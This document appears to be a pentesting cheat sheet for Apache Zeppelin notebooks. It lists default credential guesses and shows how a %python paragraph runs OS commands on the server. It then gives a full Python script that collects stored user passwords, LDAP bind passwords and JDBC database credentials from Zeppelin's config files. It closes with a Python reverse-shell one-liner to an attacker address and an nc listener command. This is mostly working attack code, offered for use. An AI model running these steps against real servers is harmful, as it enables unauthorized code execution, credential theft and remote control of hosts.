# Apache Zeppelin Pentesting

Apache Zeppelin is a web-based notebook that enables data-driven, interactive data analytics with interpreters for SQL, Scala, Python, shell and more. Each interpreter runs code on the server, so access to a notebook is effectively code execution on the host. The web UI and REST API listen on port 8080 by default.

### Authentication Config File <a href="#authentication-config-file" id="authentication-config-file"></a>

Zeppelin delegates authentication to Apache Shiro. The configuration lives under the Zeppelin installation directory (`ZEPPELIN_HOME`); a fresh install ships only the template, and anonymous access stays enabled until an administrator copies it into place and edits it.

```shellscript
conf/shiro.ini
conf/shiro.ini.template
```

### Default Credentials <a href="#default-credentials" id="default-credentials"></a>

The shipped `conf/shiro.ini.template` defines users in the Shiro form `name = password, role1, role2`, so the role names are not passwords. The pairs worth trying, with their roles:

```shellscript
admin:admin          # common guess, not in the template
admin:password1      # present in the template but commented out; works only if the admin uncommented it
user1:password2      # roles: role1, role2
user2:password3      # roles: role3
user3:password4      # roles: role2
```

### RCE in Notebooks <a href="#rce-in-notebooks" id="rce-in-notebooks"></a>

Any interpreter that runs code on the server gives OS command execution in the context of the interpreter process, so a logged-in user (or anyone, if `conf/shiro.ini` was never set up and anonymous access is still on) only needs to open a notebook and run a paragraph. The `%python` interpreter is the usual choice; `%sh` does the same where it is enabled.

```shellscript
%python

import os

# Read the Shiro config. The path is relative to the interpreter's working
# directory, normally the Zeppelin install directory (ZEPPELIN_HOME).
os.system('cat conf/shiro.ini')
```
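Once a paragraph runs, the two files worth pulling first are `conf/shiro.ini` (local users and passwords, plus any LDAP bind password in `[main]`) and `conf/interpreter.json` (saved interpreter settings, which include JDBC and similar credentials). The harvester below is an added example, not code from this page or from Zeppelin: paste it into a paragraph after the `%python` line. It assumes the interpreter's working directory is the Zeppelin install directory, and the two sample strings are constructed so the parsers can be checked without a Zeppelin host.

```python
import configparser
import json
import os
import re

# Relative to the interpreter's working directory, normally ZEPPELIN_HOME (assumption).
SHIRO_INI = "conf/shiro.ini"
INTERPRETER_JSON = "conf/interpreter.json"

SECRET_KEY = re.compile(r"(password|passwd|secret|token|credential)", re.I)


def parse_shiro_ini(text):
    """Return {'users': [(user, password, [roles])], 'secrets': {section.key: value}}.

    [users] lines have the form `name = password, role1, role2`. Any key in any
    other section whose name looks secret-bearing (for example
    ldapRealm.contextFactory.systemPassword) is reported as well.
    """
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",), strict=False)
    cp.optionxform = str            # keep key case; Shiro keys are case-sensitive
    cp.read_string(text)
    users, secrets = [], {}
    for section in cp.sections():
        for key, value in cp.items(section):
            if section == "users":
                parts = [p.strip() for p in value.split(",")]
                users.append((key, parts[0], parts[1:]))
            elif SECRET_KEY.search(key):
                secrets[f"{section}.{key}"] = value
    return {"users": users, "secrets": secrets}


def parse_interpreter_json(text):
    """Return [(interpreter, property, value)] for secret-looking properties.

    Zeppelin 0.8+ stores each property as {"name", "value", "type"}; older
    files store a plain string, so both shapes are accepted.
    """
    data = json.loads(text)
    found = []
    for name, setting in data.get("interpreterSettings", {}).items():
        for key, prop in setting.get("properties", {}).items():
            is_obj = isinstance(prop, dict)
            value = prop.get("value") if is_obj else prop
            if value and (SECRET_KEY.search(key) or (is_obj and prop.get("type") == "password")):
                found.append((name, key, value))
    return found


def harvest(shiro_path=SHIRO_INI, interpreter_path=INTERPRETER_JSON):
    """Read both files if present and return everything found."""
    results = {"users": [], "secrets": {}, "interpreter_secrets": []}
    if os.path.exists(shiro_path):
        with open(shiro_path) as fh:
            parsed = parse_shiro_ini(fh.read())
        results["users"], results["secrets"] = parsed["users"], parsed["secrets"]
    if os.path.exists(interpreter_path):
        with open(interpreter_path) as fh:
            results["interpreter_secrets"] = parse_interpreter_json(fh.read())
    return results


# Constructed samples in the shape of the real files (values are made up).
SAMPLE_SHIRO_INI = """\
[users]
# admin is commented out in the shipped template
#admin = password1, admin
user1 = password2, role1, role2
user2 = password3, role3

[main]
ldapRealm = org.apache.zeppelin.realm.LdapRealm
ldapRealm.contextFactory.systemUsername = uid=zeppelin,ou=service,dc=example,dc=com
ldapRealm.contextFactory.systemPassword = ldap-bind-secret

[roles]
role1 = *

[urls]
/api/version = anon
/** = authc
"""

SAMPLE_INTERPRETER_JSON = json.dumps({
    "interpreterSettings": {
        "jdbc": {"name": "jdbc", "properties": {
            "default.url": {"name": "default.url", "value": "jdbc:postgresql://db:5432/app", "type": "string"},
            "default.user": {"name": "default.user", "value": "app", "type": "string"},
            "default.password": {"name": "default.password", "value": "db-secret", "type": "password"},
        }},
        "python": {"name": "python", "properties": {"zeppelin.python": "python3"}},
    }
})

# In a notebook paragraph the printed JSON appears as the paragraph output.
print(json.dumps(harvest(), indent=2))
```

Paths can differ when Zeppelin runs an interpreter in a separate process or container, so if both files come back empty, print `os.getcwd()` and `os.environ.get("ZEPPELIN_HOME")` from the same paragraph and pass absolute paths to `harvest()`.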

#### Reverse Shell <a href="#reverse-shell" id="reverse-shell"></a>

Before running the following paragraph, start a listener such as **`nc -lvnp 4444`** on the attacking machine, and replace `10.0.0.1` and `4444` with that machine's address and port. The shell runs as the OS user of the interpreter process.

```shellscript
%python

import os,pty,socket;s=socket.socket();s.connect(("10.0.0.1", 4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")
```

### References <a href="#references" id="references"></a>

* [Apache Zeppelin Docs](https://zeppelin.apache.org/docs/0.8.0/setup/security/shiro_authentication.html)
